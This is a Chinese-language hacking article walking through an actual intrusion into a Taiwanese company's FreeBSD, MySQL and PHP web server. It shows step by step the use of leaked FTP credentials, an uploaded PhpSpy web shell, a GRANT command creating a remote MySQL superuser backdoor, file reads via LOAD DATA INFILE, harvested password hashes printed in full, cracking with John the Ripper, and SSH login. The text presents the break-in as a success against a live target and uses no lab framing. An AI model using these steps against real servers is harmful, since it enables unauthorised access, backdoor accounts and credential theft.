目前針對Windows+MSSQL或Windows+MYSQL的系統，在入侵方面的文章可算不少，大多通過腳本漏洞上傳WebShell，通過Serv-U提升權限，再通過PcAnyWhere或終端連接器遠程連接。就系統而言，大陸用Windows的比較多，港臺和國外很多服務器都是用的Unix、Linux或FreeBSD系統。本文就是針對的FreeBSD+MYSQL+PHP系統，結合一個具體實例，講解了一下入侵思路。其實作者的運氣不錯，遇到了一個大意的管理員——有多少服務器管理員是這樣大意的呢？

圖片1

MYSQL：入侵FreeBSD的橋梁

面對一個PHP網站的時候，我的個人習慣是先看看有沒有PHP注入漏洞，然后再看是否存在整站漏洞，如Discuz!漏洞，PHPbb執行命令漏洞等等。如果存在的話，可以利用它們上傳Webshell，如不存在的話在看看有沒有其它的系統漏洞。這次遇上的是臺灣某網絡工司的服務器，頁面很簡潔，注入漏洞、腳本漏洞都不存在，無奈之下拿出紅客聯盟的HScan v1.20，大概掃描一下看看。掃描結果圖所示。

圖片2

運氣真不錯，掃出一個FTP用戶名和密碼來，服務器還開了22（SSH），3306（MYSQL）兩個重要端口。FTP登錄，然后找一個可以上傳的WEB目錄上傳Phpspy.php，如圖3所示。

圖片3

在瀏覽器里輸入http://211.***.***.91/e***u/lib/phpspy.php，進入Phpspy.php的 “WebShell模式”鍵入命令：id //查看當前用戶：

uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)

鍵入命令：uname –a //查看系統：

FreeBSD www.e******u.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 25 11:10:00 CST 2001     Root@www.e******u.com:/home/usr/src/sys/compile/GENERIC  i386

鍵入命令：cat /etc/passwd   //讀取密碼檔

# $FreeBSD: src/etc/master.passwd，v 1.25 1999/09/13 17:09:07 peter Exp $

#

Root:*:0:0:Charlie &:/Root:/bin/csh

games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

news:*:8:8:News Subsystem:/:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

mysql:*:88:88:MySQL Daemon:/home/db/mysql:/sbin/nologin

www:*:2000:2000:WWW Administrator:/home/www/main:/bin/tcsh

chat:*:2001:2000:Chat Administrator:/home/www/chat:/bin/tcsh

game:*:2002:2000:Game Administrator:/home/www/game:/bin/tcsh

elife:*:2003:2000:eLife Administrator:/home/www/elife:/bin/tcsh

game-tnid:*:1005:0:game-tnid:/home/game-tnid:/bin/tcsh

cyc:*:1010:0:cyc:/home/cyc:/bin/tcsh

webadm:*:1012:1012:webadm:/home/webadm:/bin/tcsh

funker:*:1014:1014:funker:/home/funker:/bin/tcsh

小提示：FreeBSD的密碼加密后存放在/etc/master.passwd文件下，而不像Unix 一樣存放在/etc/shadow文件下，而且此文件只有Root用戶可以讀。

通過文件Globalvar.inc讀取數據庫信息如下：

$ethink4u_db = "web123"; // database info

$ethink4u_db_user = "Root";

$ethink4u_db_passwd = "";

$ethink4u_db_host = "localhost";

進入Phpspy.php的“SQL的查詢”頁面，連接數據庫，連接的數據名不是上面的“web123”而是“mysql”，連接成功后，輸入如下命令：

GRAWindows ALL PRIVILEGES ON *.* TO system@’%’IDEWindowsIFIED BY ’askyou’ WITH GRAWindows OPTION

一個遠程的具有Root權限的用戶“system”，密碼為：“askyou”就建成了！這樣就可以通過牛族MYSQL連接器遠程連接，整個數據庫的生殺大權就掌握在你的手中了！

連接后執行如下命令來讀取/etc/master.passwd：

user mysql; //打開數據庫mysql

create table yongge(str TEXT); //創建表yongge

load data infile “//etc//master.passwd” into table yongge;把文件master.passwd讀到表中

seletc * from yongge into outfile “//tmp//passwd”;把表中內容輸出到passwd文件中

drop table yongge; 刪除表

馬上查看/tmp/passwd文件的內容，怎么是空的？估計我擁有這的個Root權限只是對數據有最大限權，可以任意操縱數據庫，而非系統的Root。

換一種思路吧！我們給它上傳一個PhpMyAdmin-2[1].6.0-pl3.zip，也可以利用Wget命令下載下一個：“Wget [options] [URL-list]”，然后利用 Unzip命令解壓（MS Windows下的壓縮軟件Winzip壓縮的文件可以用Unzip命令，該命令用于解擴展名為.zip的壓縮文件）。

小知識：Wget的參數較多，但大部分應用只需要如下幾個常用的參數：

 -r 遞歸；對于HTTP主機，Wget首先下載URL指定的文件，然后（如果該文件是一個HTML文檔的話）遞歸下載該文件所引用（超級連接）的所有文件（遞歸深度由參數-l指定）。對FTP主機，該參數意味著要下載URL指定的目錄中的所有文件，遞歸方法與HTTP主機類似。

-N 時間戳：該參數指定Wget只下載更新的文件，也就是說，與本地目錄中的對應文件的長度和最后修改日期一樣的文件將不被下載。

-m 鏡像：相當于同時使用-r和-N參數。

-l  設置遞歸級數；默認為5。-l1相當于不遞歸；-l0為無窮遞歸；注意，當遞歸深度增加時，文件數量將呈指數級增長。

-t  設置重試次數。當連接中斷（或超時）時，Wget將試圖重新連接。如果指定-t0，則重試次數設為無窮多。

-c 指定斷點續傳功能。實際上，Wget默認具有斷點續傳功能，只有當你使用別的FTP工具下載了某一文件的一部分，并希望Wget接著完成此工作的時候，才需要指定此參數。

小知識：Unzip命令語法：unzip [選項] 壓縮文件名.zip。各選項的含義分別為：

-x 文件列表：解壓縮文件，但不包括指定的File文件。

-v 查看壓縮文件目錄，但不解壓。

-t 測試文件有無損壞，但不解壓。

-d 目錄：把壓縮文件解到指定目錄下。

-z 只顯示壓縮文件的注解。

-n 不覆蓋已經存在的文件。

-o 覆蓋已存在的文件且不要求用戶確認。

-j 不重建文檔的目錄結構，把所有文件解壓到同一目錄下。

得到PhpMyAdmin后，再修改文件Config.inc.php的變量，修改成如下格式：

$cfg[’Servers’][$i][’user’]= ’Root’;  // MySQL user

$cfg[’Servers’][$i][’password’] = ’’;  // MySQL password在游覽器里輸入http://211.***.***.91/e***u/lib/phpMyAdmin-2.6.0-pl3/index.php就可以通過Phpmyadmin管理整個數據庫了！然后進入Phpspy的WebShell模式，輸入命令如下：

locate passwd
/etc/master.passwd

/etc/passwd

/home/game-tnid/game0131/adm/passwd

/home/game-tnid/gameDemoCopyFrom_game0131/adm/passwd

/home/usr/src/etc/master.passwd

/home/usr/src/release/picobsd/floppy.tree/etc/master.passwd

/home/usr/src/usr.bin/passwd

/home/www/chat/adm/passwd

/home/www/chat.old91/adm/passwd

/home/www/cycgame/idot.20030320/coop_adm/passwd

/home/www/game/game.0727/adm/passwd

/home/www/main/DBabcd/passwd

/home/www/main/ethink4u/hotnews/admin/passwd

/mirror/etc/master.passwd

/mirror/etc/passwd

/usr/bin/passwd查看它們內容后整理密碼檔如下：

Root:$1$xOOaGnKU$U9QdsCI40XXcCUMBN.7Az.:0:0::0:0:Charlie &:/Root:/bin/sh

funker:Hk3kVaBMnSZ2s

chat:Ecu/FE6CVZKME

game-tnid:EfyN8aw51ADXw

game:h2J9eAOTG4INA

cyc:6z3daN06RdVeU

利用工具JOHN可以破解以上密碼檔。它的命令行方式：john [-功能選項] [密碼文件名]。現在開始進行解密步驟：

先消滅FOOL USER，就是“笨蛋用戶”：john -single shadow.txt；

再消滅稍微聰明一點的用戶：john -wordfile:password.lst -rules shadow.txt；

最后進行大屠殺：john -i:all shadow.txt（當然，第三步可能要你的電腦跑上10000年）。

因為服務器開了22端口，利用工具Eric’s Telnet 98 V8.4-SSH (http://www2.skycn.com/soft/1157.html)就可以遠程登錄上去了。

小提示：22端口的SSH是Secure SHell的縮寫，它是一個用來替代Telnet、FTP以及R命令的工具包，主要是想解決口令在網上明文傳輸的問題。

整個過程中運氣真的很不錯，后來Funker，cyc這兩個用戶的密碼我利用一臺P4+256DDR的機器，跑了兩天也跑出來了，www的用戶名密碼和FTP相同（不知道是不是巧合）。通常的方法是找一個Exploit，然后利用GCC命令編譯后運行并提升權限，這里就不繼續討論了。

【編輯推薦】

1. 如何使用FreeBSD防火墻保護企業網絡
2. MySQL數據庫災備的基礎知識大全
3. MySQL安全攻防實戰指南之體系結構篇